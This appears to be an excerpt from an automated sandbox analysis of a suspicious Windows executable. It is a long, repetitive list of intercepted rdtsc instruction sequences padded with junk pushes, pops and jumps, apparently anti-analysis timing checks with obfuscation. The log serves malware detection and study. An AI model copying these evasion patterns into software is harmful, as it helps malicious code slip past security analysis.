Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 171B313 second address: 171B31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 171B31C second address: 171B320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 171B97F second address: 171B984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 171B9D5 second address: 171B9D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 171BB78 second address: 171BB9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jmp 00007FC7F4EE1C4Ah 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 171BB9C second address: 171BBCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ebx 0x0000000c ja 00007FC7F4B4AE7Ch 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 pushad 0x00000019 push edx 0x0000001a pop edx 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 171BBCC second address: 171BBD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 171C29E second address: 171C2A8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC7F4B4AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16FD0DB second address: 16FD0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FC7F4EE1C46h 0x0000000c popad 0x0000000d popad 0x0000000e je 00007FC7F4EE1C7Eh 0x00000014 push ebx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007FC7F4EE1C46h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1748FEE second address: 174902D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE89h 0x00000007 jmp 00007FC7F4B4AE88h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007FC7F4B4AE7Eh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174933A second address: 174933E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174933E second address: 1749344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1749489 second address: 174948F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17495F4 second address: 17495FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17495FA second address: 1749615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC7F4EE1C46h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FC7F4EE1C4Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1749615 second address: 1749628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FC7F4B4AE76h 0x0000000d jc 00007FC7F4B4AE76h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174975A second address: 1749762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174F422 second address: 174F441 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC7F4B4AE89h 0x00000008 jmp 00007FC7F4B4AE83h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16D532D second address: 16D5361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC7F4EE1C46h 0x0000000a jmp 00007FC7F4EE1C53h 0x0000000f jmp 00007FC7F4EE1C4Ch 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jno 00007FC7F4EE1C46h 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174E395 second address: 174E39F instructions: 0x00000000 rdtsc 0x00000002 js 00007FC7F4B4AE76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174E39F second address: 174E3B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC7F4EE1C4Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174E3B3 second address: 174E3BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FC7F4B4AE76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174E6F5 second address: 174E702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174E702 second address: 174E706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174E706 second address: 174E70A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174E70A second address: 174E735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC7F4B4AE7Ah 0x0000000b pushad 0x0000000c jl 00007FC7F4B4AE76h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 jc 00007FC7F4B4AE76h 0x0000001f jne 00007FC7F4B4AE76h 0x00000025 pop edi 0x00000026 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174E735 second address: 174E73B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174E73B second address: 174E741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174EBF1 second address: 174EBF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174ED45 second address: 174ED4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174ED4B second address: 174ED5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 je 00007FC7F4EE1C46h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1755EFB second address: 1755F04 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1755F04 second address: 1755F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1755F0A second address: 1755F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16D36D3 second address: 16D36DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC7F4EE1C46h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175B657 second address: 175B66C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175A04E second address: 175A052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175A1A4 second address: 175A1AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175A1AA second address: 175A1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnl 00007FC7F4EE1C46h 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175A1BA second address: 175A1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jp 00007FC7F4B4AE76h 0x0000000f jmp 00007FC7F4B4AE7Fh 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FC7F4B4AE7Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175A1E7 second address: 175A1ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175A1ED second address: 175A212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FC7F4B4AE76h 0x00000009 jmp 00007FC7F4B4AE85h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175A212 second address: 175A216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175A37D second address: 175A386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175A386 second address: 175A38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175A681 second address: 175A692 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175A692 second address: 175A6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC7F4EE1C51h 0x0000000c jmp 00007FC7F4EE1C59h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop ecx 0x00000015 pushad 0x00000016 jmp 00007FC7F4EE1C4Dh 0x0000001b jmp 00007FC7F4EE1C4Fh 0x00000020 push eax 0x00000021 push edx 0x00000022 ja 00007FC7F4EE1C46h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175A82C second address: 175A837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175A837 second address: 175A83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175A83D second address: 175A842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175A842 second address: 175A852 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC7F4EE1C48h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175AC31 second address: 175AC35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175AC35 second address: 175AC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC7F4EE1C57h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175ADA2 second address: 175ADBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC7F4B4AE82h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175ADBA second address: 175ADBF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175ADBF second address: 175ADC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175AF0B second address: 175AF16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175E0B8 second address: 175E0BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175E0BC second address: 175E0CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC7F4EE1C46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175E0CC second address: 175E102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007FC7F4B4AE76h 0x0000000f popad 0x00000010 popad 0x00000011 push edx 0x00000012 js 00007FC7F4B4AE85h 0x00000018 jmp 00007FC7F4B4AE7Dh 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC7F4B4AE7Dh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175E102 second address: 175E106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175E288 second address: 175E2A3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC7F4B4AE76h 0x00000008 jmp 00007FC7F4B4AE7Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175E2A3 second address: 175E2C2 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC7F4EE1C46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FC7F4EE1C4Dh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175E40A second address: 175E41E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC7F4B4AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FC7F4B4AE76h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175E41E second address: 175E422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 175E422 second address: 175E44E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FC7F4B4AE7Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 176679D second address: 17667C2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FC7F4EE1C55h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FC7F4EE1C4Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1766E1C second address: 1766E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 171BFEA second address: 171BFF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 171C10E second address: 171C118 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC7F4B4AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1766FD8 second address: 1766FF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FC7F4EE1C46h 0x00000009 jmp 00007FC7F4EE1C55h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1766FF8 second address: 1767001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1767001 second address: 1767038 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC7F4EE1C4Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edi 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jmp 00007FC7F4EE1C51h 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1767038 second address: 176703C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1767C24 second address: 1767C2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1767C2A second address: 1767C52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FC7F4B4AE76h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1767C52 second address: 1767C77 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC7F4EE1C46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FC7F4EE1C4Dh 0x00000010 jne 00007FC7F4EE1C46h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1767C77 second address: 1767C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 176B0BA second address: 176B0C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 176B30B second address: 176B320 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7F4B4AE7Ch 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16CAC9C second address: 16CACA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16CACA0 second address: 16CACA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16CACA4 second address: 16CACAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16CACAF second address: 16CACC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 176B49E second address: 176B4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 176B7CE second address: 176B7D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 176B7D2 second address: 176B7D7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 176B7D7 second address: 176B7F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC7F4B4AE76h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7F4B4AE7Fh 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 176B7F5 second address: 176B7FF instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC7F4EE1C46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 176E2D4 second address: 176E2EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC7F4B4AE7Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 176E2EB second address: 176E2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
